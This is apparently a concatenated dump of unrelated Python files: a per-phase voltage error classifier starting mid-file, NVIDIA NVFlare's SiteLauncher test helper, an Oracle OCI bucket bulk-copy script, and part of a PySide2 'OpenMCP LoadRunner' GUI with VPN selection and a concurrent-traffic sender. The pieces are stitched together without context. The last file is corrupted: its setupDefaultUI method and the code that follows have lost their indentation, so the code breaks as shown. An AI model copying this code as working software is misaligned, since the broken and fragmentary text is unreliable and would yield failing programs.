    # Dead code below: an unreachable string expression kept from an earlier
    # version of this handler.
    """if flag is not None and flag == "created":
            if variable.isRunningExists():
                logger.debug("isRunning exists")
                if not variable.get_isRunning(id):
                    response = variable.run(id, data)
                    return response
                else:
                    logger.debug("System already running")
                    return "System already running"
            else:
                logger.debug("isRunning not created yet")
                response = variable.run(id, data)
                return response
        else:
            response = "Id not existing"
    except Exception as e:
        logger.error(e)
        response = e
    return response"""
def buildAnswer(listNames=None, listValues=None, thres_High=0.1, thres_Medium=0.05, thres_Low=0.025):
    """Assemble SimulationResult rows by grouping per-phase values.

    Names are grouped by the prefix before the first '.'; a trailing ".1"/
    ".2"/".3" in the full name selects the phase slot.  Each group yields a
    Voltage plus the deviation Error computed by checkError().
    """
    # unique group prefixes, first-seen order preserved
    prefixes = list(unique_everseen(n.split('.', 1)[0] for n in listNames))

    voltages_per_group = []
    errors_per_group = []
    for prefix in prefixes:
        phases = [None] * 3
        # substring match against the full name, mirroring the source naming scheme
        for idx in range(len(listValues)):
            full_name = listNames[idx]
            if prefix not in full_name:
                continue
            if ".1" in full_name:
                phases[0] = listValues[idx]
            elif ".2" in full_name:
                phases[1] = listValues[idx]
            elif ".3" in full_name:
                phases[2] = listValues[idx]
        errors_per_group.append(checkError(phases, thres_High, thres_Medium, thres_Low))
        voltages_per_group.append(Voltage(phases[0], phases[1], phases[2]))

    return [
        SimulationResult(prefix, volt, err)
        for prefix, volt, err in zip(prefixes, voltages_per_group, errors_per_group)
    ]
def checkError(value, thresHigh, thresMedium, thresLow):
    """Classify up to three phase values into high/medium/low deviation bands.

    Each non-None entry of *value* is compared against 1.0; the first band
    whose threshold it violates wins.  Returns an Error object holding three
    parallel 3-slot lists (one slot per phase position).
    """
    group_value_error_high = [None] * 3
    group_value_error_medium = [None] * 3
    group_value_error_low = [None] * 3
    # enumerate replaces the hand-maintained counter of the original
    for counter, val in enumerate(value):
        logger.info("Counter: " + str(counter))
        if val is not None:  # was the non-idiomatic `val != None`
            logger.info("Val: " + str(val))
            v = float(val)  # convert once instead of per comparison
            if v < (1 - thresHigh) or v > (1 + thresHigh):
                group_value_error_high[counter] = val
            elif v < (1 - thresMedium) or v > (1 + thresMedium):
                group_value_error_medium[counter] = val
            elif v < (1 - thresLow) or v > (1 + thresLow):
                group_value_error_low[counter] = val
    error = Error(group_value_error_high,
                  group_value_error_medium, group_value_error_low)
    return error
|
site_launcher.py | # Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shlex
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import traceback
def process_logs(log_path, pid):
    """Tee a subprocess's byte output to this process's stdout and a log file.

    Iterates b'\\n'-separated lines from ``pid.stdout`` until EOF, echoing each
    to stdout and appending (with a flush) to *log_path*.  Any exception is
    reported and swallowed so this logging thread never crashes its owner.
    """
    try:
        log_file = open(log_path, "ab")
        try:
            echo = sys.stdout.buffer.write
            for chunk in pid.stdout:
                echo(chunk)  # pass the raw bytes straight through
                log_file.write(chunk)
                log_file.flush()
        finally:
            log_file.close()
    except BaseException as err:
        traceback.print_exc()
        print(f"Exception in process_logs for file {log_path}: {err.__str__()}")
class SiteLauncher(object):
    """Launches and tracks the processes of a POC federated-learning deployment.

    Operates on a temporary copy of *poc_directory* (server/client/admin
    sub-dirs).  Server and client processes are started in their own process
    groups (setsid) so each can be terminated as a unit via os.killpg.
    """

    def __init__(
        self, poc_directory, server_dir_name="server", client_dir_name="client", admin_dir_name="admin", app_path=None
    ):
        """
        This class sets up the test environment for a test. It will launch and keep track of servers and clients.
        """
        super().__init__()
        self.original_poc_directory = poc_directory
        self.server_dir_name = server_dir_name
        self.client_dir_name = client_dir_name
        self.admin_dir_name = admin_dir_name
        self.app_path = app_path
        self.server_properties = {}  # keys: "path", "process", "log_path"
        self.client_properties = {}  # client_id -> {"path", "name", "log_path", "process"}
        self.admin_api = None
        self.logger = logging.getLogger("SiteLauncher")

        # Create temporary poc directory
        if not os.path.exists(self.original_poc_directory):
            raise RuntimeError("Please run POC command first and provide the POC path!")

        # TODO: What is log directory and should it be added here?
        # copytree needs a non-existent destination, so drop the directory
        # mkdtemp just created and reuse only its (unique) path.
        root_dir = tempfile.mkdtemp()
        if os.path.exists(root_dir):
            shutil.rmtree(root_dir)
        shutil.copytree(self.original_poc_directory, root_dir)
        self.poc_directory = root_dir
        print(f"Using root dir: {root_dir}")

    def start_server(self):
        """Launch the FL server process and a thread that tees its output to log.txt."""
        server_dir = os.path.join(self.poc_directory, self.server_dir_name)
        log_path = os.path.join(server_dir, "log.txt")
        new_env = os.environ.copy()

        # Create upload directory
        os.makedirs(os.path.join(server_dir, "transfer"), exist_ok=True)

        command = (
            f"{sys.executable} -m nvflare.private.fed.app.server.server_train "
            f"-m {server_dir} -s fed_server.json"
            f" --set secure_train=false config_folder=config"
        )
        # setsid puts the server in its own process group so stop_server()
        # can signal the whole group at once.
        process = subprocess.Popen(
            shlex.split(command, " "),
            preexec_fn=os.setsid,
            env=new_env,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
        print("Starting server ...")

        t = threading.Thread(target=process_logs, args=(log_path, process))
        t.start()

        self.server_properties["path"] = server_dir
        self.server_properties["process"] = process
        self.server_properties["log_path"] = log_path

    def start_clients(self, n=2):
        """Launch *n* client processes, each from its own copy of the client dir."""
        # Make sure that previous clients are killed
        self.stop_all_clients()
        self.client_properties.clear()

        # For each client, copy the directory
        src_client_directory = os.path.join(self.poc_directory, self.client_dir_name)
        new_env = os.environ.copy()

        for i in range(n):
            client_id = i
            client_name = self.client_dir_name + f"_{client_id}"

            # Copy and create new directory
            client_dir_name = os.path.join(self.poc_directory, client_name)
            shutil.copytree(src_client_directory, client_dir_name)
            log_path = os.path.join(client_dir_name, "log.txt")

            self.client_properties[client_id] = {}
            self.client_properties[client_id]["path"] = client_dir_name
            self.client_properties[client_id]["name"] = client_name
            self.client_properties[client_id]["log_path"] = log_path

            # Launch the new client
            client_startup_dir = os.path.join(client_dir_name)
            command = (
                f"{sys.executable} -m nvflare.private.fed.app.client.client_train -m "
                f"{client_startup_dir} -s fed_client.json --set secure_train=false config_folder=config"
                f" uid=client_{client_id}"
            )
            process = subprocess.Popen(
                shlex.split(command, " "),
                preexec_fn=os.setsid,
                env=new_env,
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
            )
            self.client_properties[client_id]["process"] = process

            print(f"Launched client {client_id} process.")

            t = threading.Thread(target=process_logs, args=(log_path, process))
            t.start()

    def get_server_data(self):
        """Return a dict describing the running server (path, process, name, log)."""
        # NOTE(review): "log_file" is never stored in server_properties (only
        # "log_path" is), so this flush branch appears to be dead code — confirm.
        if "log_file" in self.server_properties:
            self.server_properties["log_file"].flush()

        server_data = {
            "server_path": self.server_properties["path"],
            "server_process": self.server_properties["process"],
            "server_name": self.server_dir_name,
            "root_dir": self.poc_directory,
            "log_path": self.server_properties["log_path"],
        }

        return server_data

    def get_client_data(self):
        """Return parallel lists of client paths, names, and process handles."""
        client_data = {
            "client_paths": [self.client_properties[x]["path"] for x in self.client_properties],
            "client_names": [self.client_properties[x]["name"] for x in self.client_properties],
            "client_processes": [self.client_properties[x]["process"] for x in self.client_properties],
        }

        return client_data

    def stop_server(self):
        """Stop all clients, then SIGTERM the server's process group and wait on it."""
        # Kill all clients first
        try:
            self.stop_all_clients()

            # Kill the process
            if "process" in self.server_properties and self.server_properties["process"]:
                # killpg on the pid works because the server was started with
                # setsid, making its pid the process-group id.
                os.killpg(self.server_properties["process"].pid, signal.SIGTERM)

                subprocess.call(["kill", str(self.server_properties["process"].pid)])
                self.server_properties["process"].wait()
                print("Sent SIGTERM to server.")
            else:
                print("No server process.")
        except Exception as e:
            print(f"Exception in stopping server: {e.__str__()}")
        finally:
            self.server_properties.clear()

    def stop_client(self, client_id) -> bool:
        """SIGTERM one client's process group; True only on clean termination."""
        if client_id not in self.client_properties:
            print(f"Client {client_id} not present in client processes.")
            return False

        if not self.client_properties[client_id]["process"]:
            print(f"Client {client_id} process is None.")
            self.client_properties.pop(client_id)
            return False

        try:
            os.killpg(self.client_properties[client_id]["process"].pid, signal.SIGTERM)

            subprocess.call(["kill", str(self.client_properties[client_id]["process"].pid)])
            self.client_properties[client_id]["process"].wait()

            self.client_properties.pop(client_id)
            print(f"Sent SIGTERM to client {client_id}.")
        except Exception as e:
            print(f"Exception in stopping client {client_id}: {e.__str__()}")
            return False

        return True

    def stop_all_clients(self):
        """Stop every tracked client (keys are snapshotted: stop_client pops them)."""
        client_ids = list(self.client_properties.keys())
        for client_id in client_ids:
            self.stop_client(client_id)

    def stop_all_sites(self):
        """Stop everything that was launched (clients are stopped inside stop_server)."""
        self.stop_server()

    def finalize(self):
        """Delete the temporary POC working copy."""
        print(f"Deleting temporary directory: {self.poc_directory}.")
        shutil.rmtree(self.poc_directory)
|
object_storage_bulk_copy.py | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_copy.py
#
# @author: Tim S and Adi Z
#
# Supports Python 3
##########################################################################
# Info:
# Bulk copy object storage bucket to other bucket with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config - Config file section to use (tenancy profile)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket
# -sr source_region
# -sn source_namespace
# -sp source_prefix_include
# -se source_prefix_exclude
# -db destination_bucket
# -dr destination_region
# -ig ignore_check_exist
##########################################################################
import pickle
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
# Command-line interface: see the header comment block for parameter meanings.
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region (Default current connection)')
parser.add_argument('-sn', default="", dest='source_namespace', help='Source Namespace (Default current connection)')
parser.add_argument('-sp', default="", dest='source_prefix_include', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-db', default="", dest='destination_bucket', help='Destination Bucket Name')
parser.add_argument('-dr', default="", dest='destination_region', help='Destination Region')
parser.add_argument('-dn', default="", dest='destination_namespace', help='Destination Namespace (Default current connection)')
parser.add_argument('-ig', action='store_true', default=False, dest='ignore_exist', help='Ignore Check if files exist at Destination')
cmd = parser.parse_args()

# Show usage and exit when invoked with no arguments at all
if len(sys.argv) < 2:
    parser.print_help()
    raise SystemExit

if not cmd.source_bucket or not cmd.destination_bucket:
    print("Source and Destination buckets parameters are required !!!\n")
    parser.print_help()
    raise SystemExit

# Worker configuration
request_worker_count = 50  # threads issuing copy requests
status_worker_count = 50   # threads polling work-request status
status_interval = 60       # seconds between status sweeps in main()

# Try timeout
base_retry_timeout = 2
max_retry_timeout = 16**2  # 256s cap; the interval is squared on each retry

# Global Variables and queues
data = {}                        # object name -> state dict (guarded by data_lock)
data_lock = threading.Lock()
dest_bucket_memory = {}          # destination object name -> md5 (existence cache)
known_q = queue.Queue()          # objects awaiting a copy request
update_q = queue.Queue()         # objects awaiting a work-request status poll

# Global Variables
object_storage_client = None
object_storage_client_dest = None
source_bucket = cmd.source_bucket
source_region = cmd.source_region
source_namespace = cmd.source_namespace
destination_namespace = cmd.destination_namespace
source_prefix = cmd.source_prefix_include
source_prefix_exclude = cmd.source_prefix_exclude
destination_bucket = cmd.destination_bucket
destination_region = cmd.destination_region
state_file = source_bucket + "." + destination_bucket + ".wrk"

# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
    """Build the (config, signer) pair used for OCI authentication.

    Resolution order: instance principals -> delegation token (cloud shell)
    -> plain config-file authentication.  Aborts with SystemExit on the
    unrecoverable failure modes.
    """
    if is_instance_principals:
        # Instance principals: region/tenancy come from the signer itself.
        try:
            ip_signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
            return {'region': ip_signer.region, 'tenancy': ip_signer.tenancy_id}, ip_signer
        except Exception:
            print_header("Error obtaining instance principals certificate, aborting")
            raise SystemExit

    # -----------------------------
    # Delegation Token
    # -----------------------------
    if is_delegation_token:
        try:
            # Cloud shell exports OCI_CONFIG_FILE / OCI_CONFIG_PROFILE; both are required.
            env_file = os.environ.get('OCI_CONFIG_FILE')
            env_section = os.environ.get('OCI_CONFIG_PROFILE')
            if env_file is None or env_section is None:
                print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
                print("")
                raise SystemExit

            cfg = oci.config.from_file(env_file, env_section)
            token_path = cfg["delegation_token_file"]
            with open(token_path, 'r') as token_file:
                token = token_file.read().strip()

            dt_signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=token)
            return cfg, dt_signer
        except KeyError:
            print("* Key Error obtaining delegation_token_file")
            raise SystemExit
        except Exception:
            raise

    # -----------------------------
    # config file authentication
    # -----------------------------
    cfg = oci.config.from_file(
        (config_file if config_file else oci.config.DEFAULT_LOCATION),
        (config_profile if config_profile else oci.config.DEFAULT_PROFILE)
    )
    file_signer = oci.signer.Signer(
        tenancy=cfg["tenancy"],
        user=cfg["user"],
        fingerprint=cfg["fingerprint"],
        private_key_file_location=cfg.get("key_file"),
        pass_phrase=oci.config.get_config_value_or_default(cfg, "pass_phrase"),
        private_key_content=cfg.get("key_content")
    )
    return cfg, file_signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
    """Current local time: 'HH:MM:SS', or 'YYYY-MM-DD HH:MM:SS' when *full*."""
    fmt = "%Y-%m-%d %H:%M:%S" if full else "%H:%M:%S"
    return datetime.datetime.now().strftime(fmt)
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
    """Print *name* centered inside a 90-character '#' banner."""
    width = 90
    banner = '#' * width
    print("")
    print(banner)
    print("#" + name.center(width - 2, " ") + "#")
    print(banner)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
    """Print the run banner and the effective source/destination parameters."""
    print_header("Running Object Storage Bulk Copy")
    print("Written by Tim S and Adi Z, July 2020")
    print(f"Starts at : {get_time(True)}")
    print("Command Line : " + ' '.join(sys.argv[1:]))
    print(f"Source Namespace : {source_namespace}")
    print(f"Source Region : {source_region}")
    print(f"Source Bucket : {source_bucket}")
    print(f"Source Prefix : {source_prefix}")
    print(f"Dest Namespace : {destination_namespace}")
    print(f"Dest Region : {destination_region}")
    print(f"Dest Bucket : {destination_bucket}")
    print(f"State File : {state_file}")
##############################################################################
# copy_request_worker
##############################################################################
def copy_request_worker():
    """Daemon worker: pull object names off known_q and issue copy requests.

    Each copy is retried with an escalating delay (interval squared per
    attempt) until it succeeds or the delay exceeds max_retry_timeout; the
    resulting work-request id and REQUESTED status are stored in the shared
    state map.
    """
    while True:
        object_ = known_q.get()
        state = get_state_for_object(object_)
        response = None
        interval_exp = base_retry_timeout
        while True:
            try:
                response = copy_object(source_namespace, source_bucket, object_, destination_namespace, destination_region, destination_bucket, object_)
                break
            except Exception as e:
                if interval_exp > max_retry_timeout:
                    raise
                # BUG FIX: the original printed response.status here, but on a
                # failed attempt `response` is still None — report the error.
                print(" Received %s from API for object %s, will wait %s seconds before retrying." % (str(e), object_, interval_exp))
                time.sleep(interval_exp)
                interval_exp **= 2
                continue

        state['work-request-id'] = response.headers.get('opc-work-request-id')
        state['status'] = 'REQUESTED'
        set_state_for_object(object_, state, persist=False)
        known_q.task_done()
##############################################################################
# work_request_status_worker
##############################################################################
def work_request_status_worker():
    """Daemon worker: poll the status of queued work requests from update_q.

    Retries with an escalating delay (interval squared per attempt) up to
    max_retry_timeout, then records the fetched status in the shared state.
    """
    while True:
        object_ = update_q.get()
        state = get_state_for_object(object_)
        interval_exp = base_retry_timeout
        while True:
            try:
                response = object_storage_client.get_work_request(state['work-request-id'])
                state['status'] = response.data.status
                break
            except Exception as e:
                if interval_exp > max_retry_timeout:
                    raise
                # BUG FIX: the original referenced `response.status` here, but
                # `response` is unbound when the very first attempt fails
                # (NameError) — report the caught exception instead.
                print(" Received %s from API for work request %s, will wait %s seconds before retrying." % (str(e), state['work-request-id'], interval_exp))
                time.sleep(interval_exp)
                interval_exp **= 2
                continue

        set_state_for_object(object_, state, persist=False)
        update_q.task_done()
##############################################################################
# add_objects_to_queue
##############################################################################
def load_dest_bucket_to_mem(object_storage_client_dest, destination_namespace, destination_bucket):
    """Cache every destination-bucket object (name -> md5) into dest_bucket_memory.

    Pages through list_objects using the next_start_with token; prints a
    progress line every 100 pages.
    """
    global dest_bucket_memory
    page = 0
    start_token = None
    while True:
        response = object_storage_client_dest.list_objects(destination_namespace, destination_bucket, start=start_token, prefix=source_prefix, fields="md5", retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
        start_token = response.data.next_start_with
        if page % 100 == 0 and page > 0:
            print(get_time() + " - Loaded " + str(len(dest_bucket_memory)) + " files...")
        for entry in response.data.objects:
            dest_bucket_memory[str(entry.name)] = str(entry.md5)
        if not start_token:
            break
        page += 1

    print(get_time() + " - Loaded " + str(len(dest_bucket_memory)) + " files.")
##############################################################################
# add_objects_to_queue
##############################################################################
def add_objects_to_queue(ns, bucket):
    """Enqueue every eligible source object onto known_q and return the count.

    Applies the include/exclude prefix filters and skips objects already
    cached in dest_bucket_memory (i.e. already present at the destination).
    """
    global known_q
    global dest_bucket_memory
    queued = 0
    skipped = 0
    start_token = None
    while True:
        response = object_storage_client.list_objects(ns, bucket, start=start_token, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
        start_token = response.data.next_start_with
        for obj in response.data.objects:
            name = obj.name
            if source_prefix and not name.startswith(source_prefix):
                continue
            if source_prefix_exclude and name.startswith(source_prefix_exclude):
                continue

            # skip if exist in the dest bucket (Option is to use MD5 for comparison)
            if str(name) in dest_bucket_memory:
                skipped += 1
                if skipped % 100000 == 0:
                    print(get_time() + " - Skipped " + str(skipped) + " exist files...")
                continue

            set_state_for_object(name, {'status': 'KNOWN'}, persist=False)
            known_q.put(name)
            queued += 1
            if queued % 100000 == 0:
                print(get_time() + " - Added " + str(queued) + " files to queue...")
        if not start_token:
            break

    # if skipped files, print
    if skipped > 0:
        print(get_time() + " - Skipped " + str(skipped) + " exist files...")

    save_all_state()
    return queued
##############################################################################
# set_state_for_object
##############################################################################
def set_state_for_object(object_, state, persist=True):
    """Record *state* for *object_*; optionally persist the whole map to disk.

    Uses the lock as a context manager so it is released even when pickling
    or the file write raises — the original acquire()/release() pair would
    leak the lock on error and deadlock every other worker.
    """
    global data
    with data_lock:
        data[object_] = state
        if persist:
            with open(state_file, 'wb') as sf:
                pickle.dump(data, sf, protocol=pickle.HIGHEST_PROTOCOL)
        return data[object_]
##############################################################################
# save_all_state
##############################################################################
def save_all_state():
    """Persist the shared state map to the pickle state file under the lock.

    Context-managed lock so a failed file write cannot leak the lock (the
    original acquire()/release() pair was not exception-safe).
    """
    with data_lock:
        with open(state_file, 'wb') as sf:
            pickle.dump(data, sf, protocol=pickle.HIGHEST_PROTOCOL)
##############################################################################
# get_state_for_object
##############################################################################
def get_state_for_object(object_):
    """Return the state dict for *object_* (raises KeyError if unknown).

    Read is intentionally unlocked; dict reads are atomic under the GIL and
    writers only replace whole entries.
    """
    return data[object_]
##############################################################################
# get_work_request_count_by_status
##############################################################################
def get_work_request_count_by_status(status):
    """Count tracked objects whose recorded status equals *status*."""
    # sum() over a generator avoids materializing the intermediate list
    return sum(1 for s in data.values() if s.get('status') == status)
##############################################################################
# copy_object
##############################################################################
def copy_object(src_ns, src_b, src_o, dst_ns, dst_r, dst_b, dst_o):
    """Submit an asynchronous server-side copy of one object.

    Returns the raw API response; the opc-work-request-id header identifies
    the copy job for later status polling.
    """
    details = oci.object_storage.models.copy_object_details.CopyObjectDetails()
    details.source_object_name = src_o
    details.destination_namespace = dst_ns
    details.destination_region = dst_r
    details.destination_bucket = dst_b
    details.destination_object_name = dst_o
    return object_storage_client.copy_object(src_ns, src_b, details)
##############################################################################
# update_all_work_requests_status
##############################################################################
def update_all_work_requests_status(ns, bucket):
    """Queue a status refresh for every object not yet in a terminal state.

    *ns* and *bucket* are accepted for call-site symmetry but unused.
    Iterates over a snapshot of the keys: worker threads mutate ``data``
    concurrently, and iterating a live dict view while it grows raises
    RuntimeError ("dictionary changed size during iteration").
    """
    for object_ in list(data.keys()):
        state = get_state_for_object(object_)
        if state['status'] not in ('KNOWN', 'COMPLETED', 'FAILED', 'CANCELED'):
            update_q.put(object_)
    update_q.join()
    save_all_state()
##############################################################################
# connect to objec storage
##############################################################################
def connect_to_object_storage():
    """Create the source and destination ObjectStorage clients.

    Fills in the module globals: regions default to the config's region,
    namespaces default to each tenancy's namespace from the service.
    Aborts with SystemExit if either connection fails.
    """
    # global parameters
    global source_region
    global destination_region
    global source_namespace
    global destination_namespace
    global object_storage_client
    global object_storage_client_dest

    print_header("Connecting to Object Storage")

    # get signer
    config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)

    # assign region from config file
    if not source_region:
        source_region = config['region']
    if not destination_region:
        destination_region = config['region']

    try:
        # connect to source region
        print("\nConnecting to Object Storage Service for source region - " + source_region)
        object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
        if cmd.proxy:
            object_storage_client.base_client.session.proxies = {'https': cmd.proxy}

        # retrieve namespace from object storage
        if not source_namespace:
            source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
        print("Succeed.")
    except Exception as e:
        print("\nError connecting to object storage at source region - " + str(e))
        raise SystemExit

    try:
        # connect to destination object storage
        print("\nConnecting to Object Storage Service for destination region - " + destination_region)
        # NOTE(review): this aliases `config` (no copy), so the region key of
        # the shared dict is mutated; harmless here only because the source
        # client was already constructed above — confirm if reordering.
        config_destination = config
        config_destination['region'] = destination_region
        object_storage_client_dest = oci.object_storage.ObjectStorageClient(config_destination, signer=signer)
        if cmd.proxy:
            object_storage_client_dest.base_client.session.proxies = {'https': cmd.proxy}

        # retrieve namespace from object storage
        if not destination_namespace:
            destination_namespace = object_storage_client_dest.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
        print("Succeed.")
    except Exception as e:
        print("\nError connecting to object storage at destination region - " + str(e))
        raise SystemExit
##############################################################################
# main
##############################################################################
def main():
    """Drive the bulk copy: connect, spawn workers, enqueue objects, poll until done."""
    # connect to object storage
    connect_to_object_storage()

    # print command info
    print_command_info()
    print_header("Start Processing")

    # daemon workers exit automatically when the main thread finishes
    print(get_time() + " - Creating %s copy request workers." % (request_worker_count))
    for i in range(request_worker_count):
        worker = threading.Thread(target=copy_request_worker)
        worker.daemon = True
        worker.start()

    print(get_time() + " - Creating %s status workers." % (status_worker_count))
    for i in range(status_worker_count):
        worker = threading.Thread(target=work_request_status_worker)
        worker.daemon = True
        worker.start()

    if not cmd.ignore_exist:
        print(get_time() + " - Loading list of objects from destination bucket (%s) to ignore exiting files." % (destination_bucket))
        load_dest_bucket_to_mem(object_storage_client_dest, destination_namespace, destination_bucket)

    print(get_time() + " - Getting list of objects from source bucket (%s). Copies will start immediately." % (source_bucket))
    count = add_objects_to_queue(source_namespace, source_bucket)
    print(get_time() + " - Enqueued %s objects to be copied" % (count))

    if count > 0:
        print_header("Finish queuing files, start checking")

    # poll until no object is left in a non-terminal (KNOWN/REQUESTED) state
    while count > 0:
        print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
        time.sleep(status_interval)
        if get_work_request_count_by_status('KNOWN') > 0 or get_work_request_count_by_status('REQUESTED') > 0:
            print(get_time() + " - Determining copy status")
            update_all_work_requests_status(source_namespace, source_bucket)
        # hold the lock so the counts printed and tested below are consistent
        data_lock.acquire()
        print(get_time() + " - KNOWN: %s, REQUESTED: %s, COMPLETED: %s, FAILED: %s, CANCELED: %s"
              % (
                  get_work_request_count_by_status('KNOWN'),
                  get_work_request_count_by_status('REQUESTED'),
                  get_work_request_count_by_status('COMPLETED'),
                  get_work_request_count_by_status('FAILED'),
                  get_work_request_count_by_status('CANCELED'))
              )
        if get_work_request_count_by_status('KNOWN') == 0 and get_work_request_count_by_status('REQUESTED') == 0:
            data_lock.release()
            break
        else:
            data_lock.release()
    known_q.join()
    print_header("Copy Completed at " + get_time())
##############################################################################
# Execute
##############################################################################
# Script entry point.
if __name__ == '__main__':
    main()
|
ttt.py | import multiprocessing
import sys,time
from multiprocessing import Process, Event, Queue
from threading import Thread
from expressvpn import wrapper
from PySide2.QtCore import QCoreApplication, QSize, Qt, Signal, QThread, QProcess
import PySide2.QtGui, PySide2.QtWidgets as QtWidgets
from PySide2.QtWidgets import *
from wrapper import *
import requests
import os
import json
import socket
from Configure.configure import *
from MyObject.MyButton import *
from MyObject.MyComboBox import *
from MyObject.MyLabel import *
from MyObject.MyTextEdit import *
#ClusterList = {"1" : "10.0.0.1", "2" : "10.0.0.2", "3" : "10.0.0.3", "4" : "10.0.0.4"} # cluster list (disabled)
CountryList = {"USA - Los Angeles - 1" : "usla1", "Japan - Tokyo" : "jpto", "South Korea - 2" : "kr2"} # country list: display name -> VPN location code
class SysbenchInfo():
    """Connection info and current load level for one cluster's sysbench service."""

    def __init__(self, clusterName, svcIP, svcPort) -> None:
        self.clusterName = clusterName  # cluster display name
        self.svcIP = svcIP              # service IP address
        self.svcPort = svcPort          # service port
        self.loadLevel = 0              # current load level; 0 = idle
class Form(QMainWindow):
    def __init__(self):
        """Build the main window: state, widgets, VPN location list, connect-button init."""
        super().__init__()
        self.initVariable()
        self.setupDefaultUI()
        vpnlist()
        self.buttonA_Init()
    def moveEvent(self, event):
        """Track the window position in shared Global state whenever the window moves."""
        # print("check")
        Global.winX = event.pos().x()
        Global.winY = event.pos().y()
    def initVariable(self):
        """Initialize window state: per-cluster process slots and the traffic-send event."""
        self.processlist = [0,0,0,0]  # one slot per cluster process
        # self.eventA = Event()
        self.eventC = Event()
def setupDefaultUI(self):
self.setFixedSize(Global.winWidth,Global.winHeight)
self.setWindowTitle("OpenMCP LoadRunner")
self.MainWidget = QWidget(self)
self.setCentralWidget(self.MainWidget)
self.grid = QtWidgets.QGridLayout()
self.MainWidget.setLayout(self.grid)
# Up Left Widget 정의
self.upleftWidget= QWidget()
self.upleftLayout = QGridLayout()
self.upleftWidget.setLayout(self.upleftLayout)
self.amessage = MyLabel('External Client Connector')
self.amessage.setAlignment(Qt.AlignCenter)
self.alabel = MyLabel('국가:',3)
self.abuttonmessage = MyTextEdit("[Status] : <font color=\"red\">DisConnected</font>")
self.abuttonstart = MyButton('Connect',4)
self.acombobox = MyComboBox(2)
self.acombobox.addItems(CountryList)
self.abuttonstart.clicked.connect(self.buttonA_Start_event)
self.upleftLayout.addWidget(self.amessage,0,0,1,3)
self.upleftLayout.addWidget(self.alabel,1,0,1,1)
self.upleftLayout.addWidget(self.acombobox,1,1,1,1)
self.upleftLayout.addWidget(self.abuttonstart,1,2,1,1)
self.upleftLayout.addWidget(self.abuttonmessage,2,0,4,3)
# Up Right Widget 정의
self.uprightWidget= QWidget()
self.uprightLayout = QGridLayout()
self.uprightWidget.setLayout(self.uprightLayout)
self.cmessage = MyLabel('Traffic Sender')
self.cmessage.setAlignment(Qt.AlignCenter)
# self.cmessage.setStyleSheet("background-color : black; color : white; font-size: 14pt; font-weight: bold;")
# self.cmessage.setAlignment(Qt.AlignCenter)
self.clabel = MyLabel('동시 접속자 수:',3)
self.cbuttonmessage = MyTextEdit("[Status] : <font color=\"red\">Disable</font>")
self.cbuttonstart = MyButton('Send',4)
self.ccombobox = MyComboBox(2)
self.ccombobox.addItem("100")
self.ccombobox.addItem("150")
self.ccombobox.addItem("200")
self.ccombobox.addItem("1000")
self.ccombobox.addItem("5000")
self.ccombobox.addItem("10000")
self.ccombobox.addItem("50000")
self.ccombobox.addItem("100000")
#self.setStyle(self.cbuttonstart,1)
# self.setStyle(self.abuttonstop,2)
#self.setStyle(self.cmessage,6)
#self.setStyle(self.cbuttonmessage,7)
#self.setStyle(self.ccombobox,10)
self.cbuttonstart.clicked.connect(self.buttonC_Start_event)
# self.cbuttonstop.clicked.connect(self.buttonC_Stop_event)
self.uprightLayout.addWidget(self.cmessage,0,0,1,3)
